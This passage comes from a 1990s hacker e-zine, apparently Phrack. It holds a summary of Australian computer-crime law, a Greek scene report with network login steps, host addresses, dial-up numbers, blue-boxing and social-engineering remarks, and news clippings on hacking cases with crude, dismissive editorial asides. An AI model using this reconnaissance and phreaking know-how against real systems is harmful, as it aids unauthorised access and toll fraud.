  18931.         person knows or ought reasonably to know relates to:
  18932.  
  18933.                 (i) the security, defense, or international relations of
  18934.                 Australia
  18935.  
  18936.                 (ii) the existence or identity of a confidential source of
  18937.                 information relating to the enforcement of a criminal law of
  18938.                 the Commonwealth or of a State or Territory;
  18939.  
  18940.                 (iii) the enforcement of a law of the Commonwealth or of a
  18941.                 State or Territory;
  18942.  
  18943.                 (iv) the protection of public safety;
  18944.  
  18945.                 (v) the personal affairs of any person;
  18946.  
  18947.                 (vi) trade secrets;
  18948.  
  18949.                 (vii) records of a financial institution; or
  18950.  
  18951.                 (viii) commercial information the disclosure of which could
  18952.                 cause advantage or disadvantage to any person;
  18953.  
  18954. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years
  18955.  
  18956. (3) A person who:
  18957.  
  18958.         (a) by means of a facility operated or provided by the Commonwealth
  18959.         or by a carrier, has intentionally and without authority obtained
  18960.         access to data stored in a computer;
  18961.  
  18962.         (b) after examining part of that data, knows or ought reasonably to
  18963.         know that the part of the data which the person examined relates wholly
  18964.         or partly to any of the matters referred to in paragraph (2)(b); and
  18965.  
  18966.         (c) continues to examine that data;
  18967.  
  18968. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 2 Years.
  18969.  
  18970. Section 76E - Damaging data in  Commonwealth and other computers by means of
  18971.               certain facilities
  18972.  
  18973. A person who, by means of a facility operated or provided by the Commonwealth,
  18974. intentionally and without authority or lawful excuse:
  18975.  
  18976.         (a) destroys, erases or alters data stored in, or inserts data into a
  18977.         computer;
  18978.  
  18979.         (b) interferes with, or interrupts or obstructs the lawful use of,
  18980.         a computer; or
  18981.  
  18982.         (c) impedes or prevents access to, or impairs the usefulness or
  18983.         effectiveness of, data stored in a computer;
  18984.  
  18985. IS GUILTY OF AN OFFENCE - PENALTY: Imprisonment for 10 Years.
  18986.  
  18987. Section 76F - Saving of State and Territory Laws
  18988.  
  18989. Sections 76D and 76E are not intended to exclude or limit the concurrent
  18990. operation of any law of a State or Territory.
  18991.  
  18992.                                 Conclusion:
  18993.                                 ~~~~~~~~~~~
  18994. You may have noticed that any hack of a Computer in Australia could result in
  18995. you staying in a prison for quite a long time, as almost any hack would be
  18996. and offence under just about all of the subsections listed above, combine this
  18997. with a consecutive sentence and you *COULD* be in jail for over 25 years.
  18998.  
  18999.                           "Be Careful Out There!!"
  19000.  
  19001. ------------------------------------------------------------------------------
  19002.  
  19003.  
  19004.   -- The HELLenic Digital Subculture Scene --
  19005.         by Opticon the Disassembled
  19006.  
  19007.  
  19008. - "EL33t3 Hackers": "TH3rE R N0 UNKraKKable ZyZTEMZ.EV3ry1 HAS[S] It's H0L3z."
  19009. - I'm sure every "EL33t3#@$$^!!! HaKKER" has at least one hole by nature.
  19010.  
  19011.  
  19012.  "The Gods could have chosen any place but they chose Greece"...Yes, they did.
  19013. By mistake probably.
  19014.  
  19015.  Agricultural country, light industry, member of the European Community, ten
  19016. million residents, surrounded by sea (polluted in some areas) and forests
  19017. (burned in some areas). Four thousand years old culture, beautiful language
  19018. (due to it's ancientness) [...]
  19019.  
  19020.  Digital subculture scene?  Quite a few articles appear on newspapers and
  19021. magazines about CyberPunk.  Quite a few people claim to be hackers (elite ones),
  19022. crackers (elite ones), phreakers (elite ones) and coders (elite ones).
  19023. University students get insane pleasure when talking about their last
  19024. achievements, how they cracked all the accounts of a shadowed password file,
  19025. and how they transferred 2000 true color, porno JPEG and phracking files.
  19026. Public bulletin board systems distribute blue boxing related articles (Hail
  19027. Mark Tabas!) and pirate boards distribute "oNE DaY WAREZ!@!#".
  19028.  
  19029.  "Phone freaks, crackers, hackers, virus makers." At the end, an interview
  19030. with a young software cracker.  He listens to TECHNO ("the only real music"),
  19031. he would like to buy an Apple Powerbook and he needs only five minutes to
  19032. "crack a disk".
  19033.  
  19034.  No busts have taken place AS FAR AS I KNOW. Only innocent pirates and couriers
  19035. were prosecuted years ago, due to distribution of cracked programs for ZX
  19036. Spectrum, Commodore and Amstrad ("peeks, pokes, hints & tips").
  19037.  
  19038.  An article about "Legion Of Doom! - ComSec" appeared on November 1991:
  19039. "X-Hackers offer their services to companies". Glamorous picture of the
  19040. group, opinions, history, comments from a phracking illiterate journalist.
  19041.  
  19042.  An-archic 'zines (printed format) were publishing digital underground related
  19043. news, since mid '80s.
  19044.  
  19045.  A family man in my city has been using a black box for 10 years.  He accepts
  19046. calls from relatives living in Italy.
  19047.  
  19048.  At the age of seventeen Nikos Nasoyfis wrote a book about 8088/8086 assembly
  19049. programming and cracking of protection methods. He is considered to be a
  19050. genius in those areas. Upon the request of a magazine he created "the first
  19051. Hellenic virus".
  19052.  
  19053.  No Digital Underground / An-archy related systems exist, except DiES IRAE.
  19054. But of course " If [When] you are good, nobody knows that you are there ".
  19055.  
  19056.  
  19057. * Packet Switching Data Networks
  19058.  
  19059.  
  19060.  SERVICE:  HELLASPAC
  19061.  DNIC:  2023
  19062.                            LOG-IN PROCEDURES
  19063.  1.  Dial access number:
  19064.           1161 for both 300 and 1200 bps.  Additionally, the
  19065.           following access numbers are available within Athens:
  19066.           8848481, 8849021, and 3477699.
  19067.  2.  Upon connection, the user types three dots and Enter or Return:
  19068.           ... (CR)
  19069.  3.  The network will respond
  19070.           :  HELLASPAC
  19071.      If no response, repeat step 2.
  19072.  4.  Upon receipt of the network prompt, the user types (in capital letters):
  19073.           NXXXX - 0 WWWW (CR)
  19074.      where XXXX is the user's NUI and WWWW is the NUA.
  19075.  5.  HELLASPAC will answer
  19076.           :  COM
  19077.  6.  To log off, type
  19078.           (CTRL)PCLR(CR)
  19079.      The network will respond
  19080.           CLR CONF
  19081.  
  19082.  Until the end of the year a free experimental 2400bps ( 1200 baud + MNP 5 )
  19083. dial up public service will be operating at 0961-11111 (if you call this a
  19084. 2400 baud NUI, shame on you!  You know who you are :-) ). 0961-22222 will
  19085. lead to HellasTel ( Video Text ).  Can't tell if foreigners can call these
  19086. numbers.
  19087.  
  19088.  
  19089.  SERVICE: ARIADNET
  19090.  
  19091.  Ariadnet is a Hellenic research/academic network sponsored by the European
  19092. Community. There are two main hosts: LEON and ISOSUN. The first one serves
  19093. the public; dial-ups, low cost (10.000 drg for three months), yet low disk
  19094. quota (starts from 1 MB) due to "the workstation's incapability to carry
  19095. a lot of hard disks". The second one serves users who call from other
  19096. sources (i.e. PSDNs). Thanks to Ariadnet most universities provide free
  19097. internet access (usually they reach 1 KiloByte per second) in conjunction to
  19098. restricted HellasPac access (a.k.a. high expenses).
  19099.  
  19100. The following captures will talk by themselves.
  19101.  
  19102. **
  19103.  
  19104. ISOSUN @ ARIADNE     hellenic research/academic  network
  19105. login: help
  19106. Last login: Wed Mar 18 19:37:13 from 38212026
  19107. SunOS Release 4.0.3_EXPORT (ARIADNE.FEB2) #1: Thu Feb 13 13:04:45 EET 1992
  19108.  
  19109. Please, do not leave your mail in mailing queue for a long time.
  19110. Clean them up often. Otherwise your mail may be lost....
  19111.  
  19112. thanks
  19113. postmaster
  19114.  
  19115.         A R I A D N E T - X.121 server
  19116.  
  19117. Demokritos
  19118.  
  19119. isosun SUN:INTERNET,X400-R&D-MHS             10100101, leon 10100102
  19120. PRIME 9950 primos: EARN-BITNET               10100100, gatos 10100104
  19121. mVAX  DECNET-CERN (cluster)                  10100103, KE-lab 10100108
  19122. EIE mVAx                                          101002005
  19123. EKT Data Bases PERKIN-ELMER                       10100200
  19124. Kapodistriako Pan.CYBER-NOS        10100401, mVAX 10100402
  19125. Aristotelion Pan.      mVAX    13100104, unix 386 13100108,
  19126. Metsovion Polytechnion
  19127.      vms-mvax                   1010030107, sun 1010030106
  19128.      High Energy Lab                              10100351
  19129. Gen.Secr. Research UNIX V   1010050008, sequent 1010050007
  19130. ITY Pan. Patra,  CTI  unix server                 16100101
  19131. ATE Pan. Crete , FORTH                            18100100
  19132. ASSOE(Athens U. of Economics)  VAX/VMS            10100600
  19133. NATIONAL OBSERVATORY  VAX/VMS                     10100700
  19134. Rethimno Pan Kritis/Economics-Philosophy          38312025
  19135. Chania Poly. Kritis                               38212026
  19136. ZENON,INTRAKOM,ATKO, HITEC, PLANET via X25 and TCPIP/X25
  19137. ATDP6519905
  19138. ATDP6533172  V21/V22 MODEM hayes, no parity, 1 stop bit, 8 data
  19139. connect to ARIADNET pad service @ Demokritos
  19140. HELLASPAC Gateway, IXI Gateway, X400 Gateway, Internet Gateway
  19141.  
  19142. INFORMATION: +301 6513392 FAX: 6532175
  19143. TEAM: Y.Corovesis,A.Drigas,T.Telonis (+4 students)
  19144. ADMINISTRATION: A.Arvilias tel:+301 6515224
  19145. NEXT:  TEI-Pirea, EMY, NTUA-physicslab, Thessaloniki VAX9000
  19146.  
  19147. **
  19148.  
  19149.  
  19150. * Phone Network
  19151.  
  19152.  
  19153.  The last four years or so, the old analog switching centers (HDW, Rotary,
  19154. Crossbar) are being replaced with digital ones (Ericsson-Intracom AXE-10
  19155. and Siemens EWSD).  Theoretically that should be completed by the end of 1994
  19156. (according to the Christian way of chronometry).
  19157.  
  19158.  These provide the following for the masses:
  19159.  
  19160.     PAGING (was operating anyway)
  19161.     HOT LINE
  19162.     "WAKE-UP" SERVICE
  19163.     ABBREVIATED DIALLING
  19164.     THREE PARTY SERVICE
  19165.     CALL WAITING
  19166.     "DOT NOT DISTURB" SERVICE
  19167.     OUTGOING CALL BARRING
  19168.     MALICIOUS CALL IDENTIFICATION
  19169.     ABSENT SUBSCRIBER SERVICE
  19170.     LINE HUNTING
  19171.     TOLL TICKETING (sure they do!)
  19172.  
  19173.  ...and of course better control OF the masses FOR the state.
  19174.  
  19175.  I got very interesting results exploring those new centers. If I ever finish
  19176. the project it will appear in Phrack or UPi (hopefully). Damn...Better to
  19177. think over that twice.  Abusing raises eyebrows.
  19178.  
  19179.  The country direct numbers use the 00-800-country code-11 format. Believe it
  19180. or not; I had to social engineer the directory assistance operator to start
  19181. moving.  Not to mention the time and examples he needed to understand what I
  19182. was talking about. Bad luck?
  19183.  
  19184.      FINLAND                00-800-358-11
  19185.      CYPRUS                 00-800-357-11
  19186.      ICELAND                00-800-353-11
  19187.      BRITAIN/NORTH IRELAND  00-800-44-11
  19188.      SWEDEN                 00-800-46-11
  19189.      HOLLAND                00-800-31-11
  19190.      NORWAY                 00-800-47-11
  19191.      DENMARK                00-800-45-11
  19192.      FRANCE                 00-800-33-11
  19193.      GERMANY                00-800-49-11
  19194.      M.C.I.                 00-800-122155
  19195.                             00-800-1211
  19196.      SPRINT                 00-800-1411
  19197.      AT&T                   00-800-1311
  19198.  
  19199.  As of now only U.S.A. direct numbers can be used for blue boxing. It was
  19200. possible to do so and it should be possible nowadays, although I cannot
  19201. confirm that.  The last months I have spent A LOT of time scanning numbers
  19202. and frequencies but I didn't come to an end.  To be continued...
  19203.  
  19204.  
  19205. * Cellular Phone Networks
  19206.  
  19207.  
  19208.  The pen-European digital (shit!) mobile telephony system G.S.M. is being
  19209. implemented. Nothing is solid yet and of course no one claims (trumpet fanfare
  19210. added here) that phreaks out through that. In the first state PANAFON will
  19211. cover Athens and Argosaronic and afterwards all the big cities: Thessaloniki
  19212. (it should be functioning by now), Patra, Heraklio et cetera. They are planning
  19213. to cover more than 90% of the country's residents and 75% of the geographical
  19214. region. Problems appear thanks to the strange terrain. I don't know what is
  19215. going on with TELESTET.
  19216.  
  19217.  The total registered subscribers are considered to be about ten thousand.
  19218.  
  19219.  
  19220. * Miscellaneous
  19221.  
  19222.  
  19223.  An Integrated Service Digital Network is being established and local
  19224. universities are installing [optical] Fiber Distributed Data Interfaces.
  19225. PBXs are now becoming popular.
  19226.  
  19227.  Most operators know little or nothing on computer security or managing in
  19228. general. That's why some of them accept offered help and provide afterwards
  19229. (non-privileged) accounts and old, yet valuable, duplicate manuals. If some
  19230. anti-hacking measurements are taken, that is thanks to the company employers
  19231. who maintain and prepare the systems.
  19232.  
  19233.  Do not hang on this, but I think that there are no laws concerning H/P in
  19234. particular.
  19235.  
  19236.  Needless to say that no conferences take place. Of course QSD & IRC...ohhh
  19237. fuck it.
  19238.                               ==Phrack Magazine==
  19239.  
  19240.                  Volume Five, Issue Forty-Five, File 28 of 28
  19241.  
  19242.               PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
  19243.               PWN                                             PWN
  19244.               PWN              Phrack World News              PWN
  19245.               PWN                                             PWN
  19246.               PWN        Compiled by Datastream Cowboy        PWN
  19247.               PWN                                             PWN
  19248.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  19249.  
  19250.  
  19251.  
  19252. Paramount's Hack Attack                                      March 3, 1994
  19253. ~~~~~~~~~~~~~~~~~~~~~~~
  19254. Reuter News Wire
  19255.  
  19256. Though the minds of Paramount execs have surely been n potential whackings,
  19257. computer hacking was the chief focus of execs Bob Jaffe and John Goldwyn
  19258. last week.
  19259.  
  19260. The execs got Par to pay a low six-figure fee against mid-six figures to
  19261. Johnathan Littman for the rights to make a movie from his Sept. 12 LA Times
  19262. Magazine article "The Last Hacker," and major names are lining up to be
  19263. involved.
  19264.  
  19265. It's the story of Kevin Lee Poulsen, a skilled computer hacker who was so
  19266. inventive he once disabled the phone system of KIIS_FM so he could be the
  19267. 102nd caller and win the $50,000 Porsche giveaway.
  19268.  
  19269. Poulsen was caught and has been in jail for the last three years, facing
  19270. more than 100 years in prison.
  19271.  
  19272. It was a vicious tug of war between Touchstone, which was trying to purchase
  19273. it for "City Slickers" director Ron Underwood.
  19274.  
  19275. Littman, meanwhile, has remained tight with the underground community of
  19276. hackers as he researches his book.
  19277.  
  19278. That takes its tool.  Among other things, the mischief meisters have already
  19279. changed his voice mail greeting to render an obscene proposal.
  19280.  
  19281. ------------------------------------------------------------------------------
  19282.  
  19283. Hacker Attempts To Chase Cupid Away                      February 10, 1994
  19284. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19285. UPI News Sources
  19286.  
  19287. Two bachelors who rented a billboard to find the perfect mate said Thursday
  19288. they had fallen victim to a computer hacker who sabotaged their voice mail
  19289. message and made it X-rated.
  19290.  
  19291. Steeg Anderson said the original recording that informed callers
  19292. how they may get hold of the men was changed to a "perverted" sexually
  19293. suggestive message.
  19294.  
  19295. "We are getting calls from all over the country," he said.  "So we were
  19296. shocked when we heard the message.  We don't want people to get the wrong
  19297. idea."
  19298.  
  19299. "It's rare, but we've seen this kind of thing before," said Sandy Hale, a
  19300. Pac Bell spokeswoman.  "There is a security procedure that can prevent this
  19301. from happening, but many people simply don't use it."
  19302.  
  19303. ------------------------------------------------------------------------------
  19304.  
  19305. Wire Pirates                                                    March 1994
  19306. ~~~~~~~~~~~~
  19307. by Paul Wallich (Scientific American) (Page 90)
  19308.  
  19309. Consumers and entrepreneurs crowd onto the information highway, where
  19310. electronic bandits and other hazards await them.
  19311.  
  19312. [Scientific American's latest articles about the perils of Cyberspace.
  19313.  Sound bytes galore from Dorothy Denning, Peter Neumann, Donn Parker,
  19314.  Mark Abene, Gene Spafford and others.  Much better than their last attempt
  19315.  to cover such a thing back in 1991.]
  19316.  
  19317.  
  19318. ------------------------------------------------------------------------------
  19319.  
  19320. AT&T Warns Businesses                                     December 8, 1993
  19321. ~~~~~~~~~~~~~~~~~~~~~
  19322. Business Wire Sources
  19323.  
  19324. AT&T urges businesses to guard against increased risk of toll-fraud attempts
  19325. by hackers, or toll-call thieves, during the upcoming holiday season.
  19326.  
  19327. Last year nationwide toll-fraud attempts increased by about 50 percent during
  19328. the Christmas week.  Hackers "break into" PBXs or voice-mail systems, obtain
  19329. passwords or access to outside lines, and then sell or use the information to
  19330. make illegal international phone calls.
  19331.  
  19332. Toll fraud cost American businesses more than $2 billion in 1993.  "Hackers
  19333. count on being able to steal calls undetected while businesses are closed
  19334. during a long holiday weekend," says Larry Watt, director of AT&T's Toll
  19335. Fraud Prevention Center.  "Tis the season to be wary."
  19336.  
  19337. AT&T is the industry leader in helping companies to prevent toll fraud.
  19338. Businesses that want more information on preventative measures can request
  19339. AT&T's free booklet, "Tips on Safeguarding Your Company's Telecom Network,"
  19340. by calling 1-800-NET-SAFE.
  19341.  
  19342. ------------------------------------------------------------------------------
  19343.  
  19344. Sadomasochists Meet Cyberpunks At An L.A. Party              June 14, 1993
  19345. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19346. by Jessica Seigel (Chicago Tribune)
  19347.  
  19348. Sadomasochists meet the cyberpunks.  Leather meet hypernormalcy.  Body
  19349. piercing meet network surfing (communicating by computer).  It was a night
  19350. for mingling among the subcultures to share their different approaches to
  19351. messing with mind and body.
  19352.  
  19353. The recent party at the S&M club "Club Fuck" was organized by "Boing Boing,"
  19354. a zine that focuses on the kinetic, futuristic world of the new frontier
  19355. known as cyberspace.  This place doesn't exist in a physical location, but
  19356. anyone can visit from their home computer by hooking into vast electronic
  19357. networks.
  19358.  
  19359. A blindfolded man dressed in a jock strap and high heeled boots stood on
  19360. stage while helpers pinned flashing Christmas lights to his flesh with thin
  19361. needles.  Then a man with deer antlers tied to his forehead whipped him.
  19362.  
  19363. The crowd of mostly twentysomethings who came to the club because of the
  19364. cyber theme observed with stony expressions.  Chris Gardner, 24, an
  19365. architecture student who studied virtual reality in school, covered his
  19366. eyes with his hand.
  19367.  
  19368. No one, really was "fitting in."  The sadomasochists looked curiously at the
  19369. very-average-looking cyber fans, who openly gawked back at the black
  19370. leather, nudity and body piercing.
  19371.  
  19372. Sharing subcultures can be so much fun.
  19373.  
  19374. ------------------------------------------------------------------------------
  19375.  
  19376. Intruder Alert On Internet                                February 4, 1994
  19377. ~~~~~~~~~~~~~~~~~~~~~~~~~~
  19378. AP News Sources
  19379.  
  19380. Intruders have broken into the giant Internet computer network and users are
  19381. being advised to protect themselves by changing their passwords.
  19382.  
  19383. The breaks-ins may jeopardize the work of tens of thousands of computer
  19384. users, warned the Computer Emergency Response Team, based at Carnegie
  19385. Mellon University in Pittsburgh.
  19386.  
  19387. "Intruders have already captured access information for tens of
  19388. thousands of systems across the Internet," said an emergency response
  19389. team sent out on the network late Thursday.
  19390.  
  19391. Passwords were obtained by the intruders using a "Trojan horse
  19392. program," so called because it can enter the main computer for some
  19393. legitimate purpose, but with coding that lets it remain after that
  19394. purpose is accomplished.
  19395.  
  19396. The program then records the first 128 keystrokes when someone else
  19397. connects to the Internet, and the illegal user later dials in and
  19398. receives that information. The first keystrokes of a user generally
  19399. contain such information as name and password of the user. Once they
  19400. know that the intruders can then sign on as the person whose password
  19401. they have stolen, read that person's files and change them if they
  19402. wish.
  19403.  
  19404. ------------------------------------------------------------------------------
  19405.  
  19406. Harding Email Compromised by Journalists                 February 27, 1994
  19407. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19408. by C.W. Nevius (SF Chronicle)
  19409.  
  19410. In another example of the media circus that has dogged Tonya Harding,
  19411. a number of American journalists have apparently obtained the secret computer
  19412. code numbers that would allow them to read Harding's personal electronic mail
  19413. at the Winter Olympics.
  19414.  
  19415. No reporters have admitted reading Harding's electronic mail, but the
  19416. apparent access to private communications has caused concern among those
  19417. covering the Games.
  19418.  
  19419. The Olympic computer system is one of the most popular communications devices
  19420. at the Games.  Any member of the Olympic family -- media, athlete or Olympic
  19421. official -- can message anyone else from any of several hundred
  19422. computer terminals all over the Olympic venues.
  19423.  
  19424. The flaw in the system is that it is not especially difficult to
  19425. break the personal code.  Every accredited member of the Olympic family is
  19426. given an identification number.  It is written on both the front and back
  19427. of the credential everyone wears at the Games.  Anyone who has a face-to-face
  19428. meeting with an athlete would be able to pick up the accreditation number,
  19429. if the person knew where to look.
  19430.  
  19431. Each person is also given a "Secret" password to access the communication
  19432. system.  At the outset, the password was comprised of the digits corresponding
  19433. to that person's birth date.  Although Olympic officials advised everyone
  19434. to choose their own password, Harding apparently never got around to doing
  19435. so.
  19436.  
  19437. Harding's initial password would have been 1112, because her birthday
  19438. is the 11th of December.
  19439.  
  19440. Although none of the writers at the Olympics has admitted reading Harding's
  19441. personal electronic mail, it would be difficult, if not impossible, to
  19442. determine if anyone did any actual snooping.  There are no records kept
  19443. of who signs on to the computer from any particular terminal.
  19444.  
  19445. ------------------------------------------------------------------------------
  19446.  
  19447. Reality Check                                                 January 1994
  19448. ~~~~~~~~~~~~~
  19449. by Doug Fine (Spin) (Page 62)
  19450.  
  19451. I ask accused hacker Kevin Lee Poulsen if, as he approaches three years in
  19452. jail without trial, he has any regrets about his computer-related activities.
  19453. Without missing a beat, and breaking a media silence that began with his
  19454. first arrest in 1988, he answers: "I regret shopping at Hughes Supermarket.
  19455. I'm thinking of organizing a high-tech boycott."
  19456.  
  19457. Poulsen is referring to the site of his 1991 bust in Van Nuys, California.
  19458. There, between the aisles of foodstuffs, two zealous bag-boys -- their resolve
  19459. boosted by a recent episode of Unsolved Mysteries that featured the alleged
  19460. criminal -- jumped the 25-year-old, wrestled him to the ground, and handed
  19461. the suspect over to the security agents waiting outside.
  19462.  
  19463. Poulsen still kicks himself for returning to Hughes a second time that
  19464. spring evening.  According to court documents, a former hacker crony of
  19465. Poulsen's, threatened with his own prison sentence, had tipped off the
  19466. FBI that Poulsen might be stopping by.
  19467.  
  19468. What, I ask him, had he needed so badly that he felt compelled to return
  19469. to a supermarket at midnight?
  19470.  
  19471. "Do you even have to ask?" he says. "Condoms, of course."
  19472.  
  19473. [A very different Kevin Poulsen story.  Get it and read it.]
  19474.  
  19475. ------------------------------------------------------------------------------
  19476.  
  19477. Key Evidence in Computer Case Disallowed                   January 4, 1994
  19478. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19479. Los Angeles Staff Writers (Los Angeles Times) (Page B3)
  19480.  
  19481. U.S. District Judge Ronald Whyte in San Jose said computer tapes found
  19482. in a storage locker rented by Kevin Lee Poulsen should not have been
  19483. examined by prosecutors without a search warrant and cannot be used as
  19484. evidence.
  19485.  
  19486. Whyte had ruled the tapes admissible last month but changed his mind,
  19487. saying he had overlooked evidence that should have put a police officer
  19488. on notice of Poulsen's  privacy rights.
  19489.  
  19490. In addition to illegal possession of classified government secrets,
  19491. Poulsen faces 13 other charges, including eavesdroping on telephone
  19492. conversations, and tapping into Pacific Bell's computer and an unclassified
  19493. military computer network. He could be sentenced to 85 years in prison if
  19494. convicted of all charges.
  19495.  
  19496. His lawyer, Paul Meltzer of Santa Cruz, said the sole evidence of the
  19497. espionage charge is contained on one of the storage locker tapes. Meltzer
  19498. said a government analyst found that the tape contained a 1987 order,
  19499. classified secret, concerning a military exercise.
  19500.  
  19501. Poulsen, who lived in Menlo Park at the time of his arrest in the San
  19502. Jose case, worked in the mid-1980s as a consultant testing Pentagon computer
  19503. security. He was arrested in 1988 on some of the hacking charges, disappeared
  19504. and was picked up in April, 1991, after a tip prompted by a television show.
  19505.  
  19506. ------------------------------------------------------------------------------
  19507.  
  19508. Hacker to ask charges be dropped                           January 4, 1994
  19509. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19510. UPI News Sources
  19511.  
  19512. An attorney for a former Silicon Valley computer expert accused of raiding
  19513. confidential electronic government files said Tuesday he will ask to have
  19514. charges dismissed now that a federal judge has thrown out the government's
  19515. chief evidence.
  19516.  
  19517. Attorney Peter Leeming said the government's case against Kevin L.
  19518. Poulsen is in disarray following a ruling suppressing computer tapes and
  19519. other evidence seized from a rented storage locker in 1988.
  19520.  
  19521. ''We're ready to go to trial in the case, and actually we're looking
  19522. forward to it,'' Leeming said.
  19523.  
  19524. Poulsen is charged with espionage and other offenses stemming from his
  19525. hacking into military and Pacific Bell telephone computers. The government
  19526. alleges that  Poulsen illegally obtained confidential military computer codes
  19527. and confidential information on court-ordered wiretaps.
  19528.  
  19529. ------------------------------------------------------------------------------
  19530.  
  19531. The Password is Loopholes                                    March 1, 1994
  19532. ~~~~~~~~~~~~~~~~~~~~~~~~~
  19533. by Joshua Quittner (Newsday) (Page 61)
  19534.  
  19535. You'd think that Polytechnic University, in Brooklyn, one of the finer
  19536. technical schools in the country, would know how to safeguard its
  19537. computer system against hacker intrusions. And you'd think the same of
  19538. New York University's Courant Institute, which hosts the mathematical
  19539. and computer science departments.
  19540.  
  19541. But a teenage Brooklyn hacker, who calls himself Iceman, and some
  19542. of his friends say they invaded the schools Internet-connected
  19543. computers and snatched the passwords of 103 students.
  19544.  
  19545. Internet break-ins have been a national news story lately, with
  19546. reports that unknown intruders have purloined more than 10,000 passwords
  19547. in a burst of activity during recent months. The Federal Bureau of
  19548. Investigation is investigating, since so many "federal-interest
  19549. computers" are attached to the wide-open Internet and since it is a
  19550. crime to possess and use other peoples' passwords.
  19551.  
  19552. Experts now believe that a group of young hackers who call
  19553. themselves The Posse are responsible for the break-ins, though who they
  19554. are and what they're after is unclear. Some people believe the crew is
  19555. merely collecting passwords for bragging rights, while others suspect
  19556. more insidious motives. Their approach is more sophisticated, from a
  19557. technical standpoint, than Iceman's. But the result is the same.
  19558.  
  19559. Now Iceman, who's 18, has nothing to do with The Posse, never heard
  19560. of it, in fact. He hangs with a group of budding New York City hackers
  19561. who call themselves MPI.
  19562.  
  19563. Iceman told me it was simple to steal 103 passwords on the
  19564. universities systems since each password was a common word or name.
  19565.  
  19566. What did Iceman and company do with the passwords?
  19567.  
  19568. He said mostly, they enjoy reading other people's files and e-mail.
  19569. "Every once in a while," he said, "you get something interesting."
  19570.  
  19571. ------------------------------------------------------------------------------
  19572.  
  19573. A Rape In Cyberspace                                     December 21, 1993
  19574. ~~~~~~~~~~~~~~~~~~~~
  19575. by Julian Dibbell (Village Voice) (Page 36)
  19576.  
  19577. [<SNIFF>  Some guy made my MUD character do bad things in a public
  19578.  area.  And all the other MUDders could do was sit and watch!  WAHHHHH.
  19579.  
  19580.  Get a fucking life, people.  Wait, let me restate that; Get a
  19581.  FUCKING REAL LIFE!]
  19582.  
  19583. ------------------------------------------------------------------------------
  19584.  
  19585. Hacking Goes Legit                                        February 7, 1993
  19586. ~~~~~~~~~~~~~~~~~~
  19587. by Ann Steffora and Martin Cheek (Industry Week) (Page 43)
  19588.  
  19589. Corporations ARE using "tiger teams" and less glamorous methods to check
  19590. computer security.
  19591.  
  19592. [Uh, yeah.  Sure they are.  Hey, is that an accountant in your dumpster?
  19593.  Better tuck in that tie dude.  Don't forget your clipboard!
  19594.  
  19595.  I will put a computer security audit by me, or by anyone from the hacker
  19596.  community, against a computer security audit done by ANY of the following:
  19597.  Coopers & Lybrand, Deloitte & Touche, Arthur Andersen or Price Waterhouse.
  19598.  It's no contest.  These people are NOT computer people.  Period.
  19599.  
  19600.  Get the hell out of the computer business and go do my fucking taxes.]
  19601.  
  19602. ------------------------------------------------------------------------------
  19603.